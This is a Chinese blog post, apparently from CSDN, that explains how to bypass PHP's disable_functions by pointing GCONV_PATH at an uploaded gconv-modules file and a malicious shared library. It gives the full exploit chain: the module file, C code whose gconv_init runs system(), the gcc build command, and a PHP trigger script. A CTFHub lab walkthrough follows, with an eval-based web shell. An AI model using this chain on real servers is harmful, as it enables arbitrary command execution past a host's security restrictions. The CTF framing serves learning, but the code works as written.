使用GCONV_PATH与iconv进行bypass disable_functions

最新推荐文章于 2024-04-27 21:26:14 发布
最新推荐文章于 2024-04-27 21:26:14 发布
阅读量7.7k 收藏 8
点赞数 10
文章标签: 安全 linux php 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42303523/article/details/117911859
版权

你需要知道的前置知识

php在执行iconv函数时,实际上是调用glibc中的iconv相关函数,其中一个很重要的函数叫做iconv_open()。

php的iconv函数的第一个参数是字符集的名字,这个参数也会传递到glibc的iconv_open函数的参数中。

下面我们来看一下iconv_open函数的执行过程:

  1. iconv_open函数首先会找到系统提供的gconv-modules文件,这个文件中包含了各个字符集的相关信息存储的路径,每个字符集的相关信息存储在一个.so文件中,即gconv-modules文件提供了各个字符集的.so文件所在位置。
  2. 然后再根据gconv-modules文件的指示去链接参数对应的.so文件。
  3. 之后会调用.so文件中的gconv()与gonv_init()函数。
  4. 然后就是一些与本漏洞利用无关的步骤。

linux系统提供了一个环境变量:GCONV_PATH,该环境变量能够使glibc使用用户自定义的gconv-modules文件,因此,如果指定了GCONV_PATH的值,iconv_open函数的执行过程会如下:

  1. iconv_open函数依照GCONV_PATH找到gconv-modules文件。
  2. 根据gconv-modules文件的指示找到参数对应的.so文件。
  3. 调用.so文件中的gconv()和gonv_init()函数。
  4. 一些其他步骤。

bypass过程

我们的利用方式就是首先在某一文件夹(一般是/tmp)中上传gconv-modules文件,文件中指定我们自定义的字符集文件的.so,然后我们再在.so文件中的gonv_init()函数中书写命令执行函数,之后上传php的shell,内容是使用php设定GCONV_PATH指向我们的gconv-modules文件,然后使用iconv函数使我们的恶意代码执行。

当我们使用浏览器访问我们上传的shell之后,服务器会做如下步骤:

  1. 设定GCONV_PATH指向我们的gconv-modules文件。
  2. 执行php的iconv函数,本质上调用了glibc的iconv_open函数。
  3. iconv_open函数依照GCONV_PATH找到我们上传gconv-modules文件。
  4. 根据gconv-modules文件的指示找到参数对应的.so文件。
  5. 调用.so文件中的gconv()和gonv_init()函数,当然,其中是我们想要服务器执行的系统命令。

实际操作

首先上传gconv-modules文件于/tmp文件夹,其内容如下:

module  自定义字符集名字(大写)//    INTERNAL    ../../../../../../../../tmp/自定义字符集名字(小写)    2
module  INTERNAL    自定义字符集名字(大写)//    ../../../../../../../../tmp/自定义字符集名字(小写)    2

然后书写利用的.so文件内容:

#include <stdio.h>
#include <stdlib.h>

void gconv() {}

void gconv_init() {
  system("希望执行的命令");
}

然后执行shell命令:

gcc 源代码文件名.c -o 自定义字符集名.so -shared -fPIC

上传该文件到/tmp。

书写shell.php:

<?php
    putenv("GCONV_PATH=/tmp/");
    iconv("自定义字符集名", "UTF-8", "whatever");
?>

上传到web目录下然后浏览器访问执行即可。

靶场实战

靶场使用的是ctfhub的靶场。

目标是执行/readflag命令获取flag值。

进入网站,网页显示当前脚本的源代码:

<?php
@eval($_REQUEST['ant']);
show_source(__FILE__);
?>

使用蚁剑连接,发现无法进行命令执行,需要bypass disable_function。

书写gconv-modules文件,内容如下:

module  HACK//    INTERNAL    ../../../../../../../../tmp/hack    2
module  INTERNAL    HACK//    ../../../../../../../../tmp/hack    2

上传该文件至/tmp文件夹下。

再书写hack.c文件,内容如下:

#include <stdio.h>
#include <stdlib.h>

void gconv() {}

void gconv_init() {
  system("/readflag > /tmp/flag");
}

执行shell命令:

gcc hack.c -o hack.so -shared -fPIC

将生成的.so文件上传到/tmp。

书写shell.php内容如下:

<?php
    putenv("GCONV_PATH=/tmp/");
    iconv("hack", "UTF-8", "whatever");
?>

上传到/var/www/html文件夹下。

使用浏览器访问。

此时/tmp/flag中已经存储了flag值。

lesion__
关注
  • 10
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 6
    评论
gconv覆盖率统计工具
淡蓝
11-24 2884
1) gcc -fprofile-arcs -ftest-coverage -o test test.c  2)./test 运行生成test.gcda  3)gcov test.c        File 'test.c'        Lines executed:87.50% of 8        test.c:creating 'test.c.gcov'  4)通过l
gconv_experiments, 群变分卷积网络实验.zip
11-07
gconv_experiments, 群变分卷积网络实验 实验用于复制所报告实验的代码: T.S. Cohen, M 。 ,群可变卷积网络。 计算机学习( ICML ) 国际会议( 1 ) 旋转平移组p4上的旋转特征图。 请参阅纸张的第 4节。结果与其他方法的比较在CIFAR10上比
学一下gconv, gprof等知识
weixin_33878457的博客
03-02 430
p.p1 { margin: 0.0px 0.0px 0.0px 0.0px; line-height: 21.0px; font: 13.0px "Microsoft YaHei"; color: #323333 } span.s1 { } scons、gcc、gdb、valgrind、gcov   SCons 是一个用 Python 语言编写的类似于 make 工具的程序。与 make 工具相...
go gconv有哪些功能?
最新发布
leijmdas的专栏
04-27 166
1. **基本类型转换**:`gconv`支持将任何类型的变量转换为基本数据类型,如`int`、`float32`、`float64`、`bool`、`string`、`uint`、`int8`、`int16`、`int32`、`int64`、`uint8`、`uint16`、`uint32`、`uint64`等。2. **Slice类型转换**:可以转换为`[]byte`、`[]int`、`[]float64`、`[]string`和`[]interface{}`等。
php mysql iconv_phpiconv函数使用方法
weixin_35081861的博客
01-21 80
在选择用什么工具开发,唯一的指导标准就是:用最少的人力,最少的时间开发JavaEye网站,并且后期维护和持续升级,乃至重写的时候,代价最小。首先排除Java和C#,代码太多太麻烦;其次排除PHP,项目一大,代码一多,代码的管理很成问题,PHP缺乏一个起码的包管理机制;a.上iconv的官方下载站点http://ftp.gnu.org/pub/gnu/libiconv/下面Windows版的icon...
gconv.Map()
老猿说说专栏
04-03 342
func Map(value interface{}, tags ...string) map[string]interface{} { if value == nil { return nil } if r, ok := value.(map[string]interface{}); ok { return r } else { // Only assert the com...
PHP下编码转换函数mb_convert_encoding与iconv使用说明
10-29
mb_convert_encoding这个函数是用来转换编码的。原来一直对程序编码这一概念不理解,不过现在好像有点开窍了。
PHP中mb_convert_encoding与iconv函数的深入解析
10-27
总的来说,理解和掌握`mb_convert_encoding`与`iconv`在PHP中的使用是开发跨平台、多语言网站的关键。合理利用这两个函数,可以确保数据在不同环境之间正确、无损地传递,避免出现乱码问题。在启用这两个函数之前,...
apr-iconv-1.2.2-win32-src.zip_155_3GRP_APR iconv 1.2.2_apr-iconv
09-21
由于Windows系统默认使用的是宽字符集(如Unicode的UTF-16LE),因此在与使用其他编码的系统或文件交互时,就需要依赖APR Iconv来完成转换。开发者需要了解如何正确设置编译选项,以确保在编译和运行时正确链接到APR...
apr-iconv-0.9.7-win32-src-r2.zip_APR iconv_apr-iconv-0.9.7_openg
09-19
使用这个资源,开发者可以学习如何在他们的应用中集成APR Iconv进行字符编码转换,以及如何利用OpenGL进行图形渲染。对于游戏开发者来说,这可能是学习如何在DirectX和OpenGL之间互换数据,或者在处理多语言游戏文本...
Golang类型转换模块 - gconv
weixin_34238633的博客
10-31 1520
原文地址:https://gfer.me/util/gconv/index gf框架提供了非常强大的类型转换包gconv,可以实现将任何数据类型转换为指定的数据类型,对常用基本数据类型之间的无缝转换,同时也支持任意类型到struct对象的属性赋值。由于gconv模块内部大量使用了断言而非反射(仅struct转换使用到了反射),因此执行的效...
php 中文 iconv不管用,php使用iconv中文截断问题的解决方法
weixin_29186249的博客
03-13 189
本文实例讲述了php使用iconv中文截断问题的解决方法。。具体分析如下:今天做了一个采集程序,原理很简单,使用curl方法把对方页面的html获取分析,然后正则提取需要的数据并保存在数据库。由于对方页面是GB2312编码,而本地使用的是UTF-8编码。因此在采集后需要进行编码转换。使用iconv方法进行编码转换iconv — 字符串按要求的字符编码来转换string iconv ( strin...
第五周深度学习总结
weixin_72552113的博客
08-10 667
ShuffleNet EfficientNet Multi-Head Self-Attention
浅析 Linux 的国际化与本地化机制
wing的专栏
09-13 1012
什么是国际化和本地化 不同的国家和地区因文化的差异,在日期、时间以及货币符号等表示方式上都不完全相同,最为明显的就是语言。有时在编写软件给用户使用时,开发者、维护者以及最终用户可能分别来自不同的区域,而要求他们均使用同一种语言显然是不明知的,因此当一个程序或者软件编写给全世界人使用时,通常分为两个部分:国际化 (internationalization,即缩写为 i18n,这是由于在这个单词
【CVE-2021-4034】 漏洞详细原理以及复现,polkit的pkexec中的本地提权漏洞
Ba1_Ma0的博客
04-11 5658
简介 一个隐藏了12年的危险漏洞,利用的是polki的pkexec,它是一个 SUID 根程序,默认安装在每个主要的 Linux 发行版 Null 当你在linux下要查看文件时,运行列如像cat这样的程序,并提供test.txt作为参数 所以整个参数数组看起来如下: cat test.txt 0 1 cat是第一个参数索引’0’,第一个参数通常是程序本身的名称,在我们的例子中它是cat 第二个参数是我们刚刚提供带有索引’1’的test.txt的文件名,这些都是字符串 但是在内存中,过程看起来像
CVE-2021-4034 Pkexec LPE原理精析
「鸿渐之翼」的博客
02-26 5433
国外Qualys安全团队在CVE平台披露了Linux系统Polkit中的pkexec组件存在的本地权限提升漏洞(CVE-2021-4034)。Polkit默认安装在各个主要的 Linux 发行版本上(诸如Ubuntu、Debian、Fedora等知名Linux发型版本),pkexec程序对传入参数未过滤,攻击者可以将环境变量bash作为命令执行,从而诱导 pkexec 执行任意代码,利用成功可导致非特权用户获得管理员r
构建Linux根文件系统
u010919352的博客
06-05 841
本文主要是对韦东山老师的《嵌入式Linux应用开发完全手册》中第17章中的小结,以及一些自己的经验看法。 概要:本文讲述了Linux根目录中各个目录的作用和内容、busybox工具的使用、内核在加载init进程后进行的操作、mdev是如何被加入Linux的、glibc库的移植。 Linux文件系统概述 Linux中没有像windows的C、D、E盘之分,只有一个根文件系统,其它文件系统通
iconv_open() 出现 Invalid argument 错误的解决方法
anren7769的博客
09-03 3268
需要字符库的支持: 转载:https://www.cnblogs.com/JonnyLulu/archive/2013/07/22/3170118.html iconv相关文件 在PC机上使用iconv一般都会正常,但是一旦到了嵌入式linux中,往往会调用失败,这是因为缺少相关文件。libc只实现了接口iconv, 但并没有实现具体的转换细节,可以想想,那么多的编码类...
AC_CONFIG_SUBDIRS([libhtp]) HTP_DIR="libhtp" AC_SUBST(HTP_DIR) HTP_LDADD="../libhtp/htp/libhtp.la" AC_SUBST(HTP_LDADD) # make sure libhtp is added to the includes CPPFLAGS="-I${srcdir}/../libhtp/ ${CPPFLAGS}" AC_CHECK_HEADER(iconv.h,,[AC_MSG_ERROR(iconv.h not found ...)]) AC_CHECK_LIB(iconv, libiconv_close) AC_DEFINE_UNQUOTED([HAVE_HTP_URI_NORMALIZE_HOOK],[1],[Assuming htp_config_register_request_uri_normalize function in bundled libhtp])
06-05
这段代码主要是用于检查和配置libhtp库的相关信息。 AC_CONFIG_SUBDIRS([libhtp])表示将libhtp作为子目录进行配置。 HTP_DIR="libhtp"和AC_SUBST(HTP_DIR)用于将libhtp的路径保存在变量HTP_DIR中,并将变量HTP_DIR导出为Makefile中的变量。 HTP_LDADD="../libhtp/htp/libhtp.la"用于在链接时加入libhtp库。 CPPFLAGS="-I${srcdir}/../libhtp/ ${CPPFLAGS}"表示将libhtp的路径加入到预处理器选项中。 AC_CHECK_HEADER(iconv.h,,[AC_MSG_ERROR(iconv.h not found ...)])用于检查是否存在iconv.h头文件,如果不存在,则输出错误信息。 AC_CHECK_LIB(iconv, libiconv_close)用于检查是否存在libiconv库,如果不存在,则不进行任何操作。 AC_DEFINE_UNQUOTED([HAVE_HTP_URI_NORMALIZE_HOOK],[1],[Assuming htp_config_register_request_uri_normalize function in bundled libhtp])用于判断是否存在函数htp_config_register_request_uri_normalize,如果存在,则将宏HAVE_HTP_URI_NORMALIZE_HOOK定义为1,否则定义为0。这个宏的定义同样使用了AC_DEFINE_UNQUOTED宏。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值